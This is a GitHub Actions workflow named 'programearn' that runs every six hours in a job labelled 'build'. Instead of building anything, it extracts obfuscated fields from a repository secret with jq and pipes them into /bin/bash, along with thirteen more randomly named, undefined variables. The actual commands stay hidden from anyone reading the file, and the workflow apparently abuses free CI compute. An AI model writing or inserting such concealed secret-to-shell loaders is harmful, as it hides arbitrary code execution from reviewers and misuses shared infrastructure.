name: programearn

on:
  workflow_dispatch:
  schedule:
    - cron: '53 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: programearn
        env:
          v5421: ${{ secrets.v5421 }}
        run: |
          echo $v5421 | jq -r .jfbwh914 | /bin/bash
          echo $hl2125 | jq -r .av3 | /bin/bash
          echo $dn2676 | jq -r .dn57 | /bin/bash
          echo $jtjij4049 | jq -r .ylfan4011 | /bin/bash
          echo $hm5 | jq -r .vfu8 | /bin/bash
          echo $fey2671 | jq -r .tnlb878 | /bin/bash
          echo $cy80 | jq -r .dxmhv726 | /bin/bash
          echo $g4 | jq -r .lhd4298 | /bin/bash
          echo $wzy88 | jq -r .wsmnr3 | /bin/bash
          echo $ykqi731 | jq -r .raqj40 | /bin/bash
          echo $sala9305 | jq -r .cr69098 | /bin/bash
          echo $aqdbx60402 | jq -r .b23 | /bin/bash
          echo $fbx81 | jq -r .o4266 | /bin/bash
          echo $k8009 | jq -r .vs9279 | /bin/bash

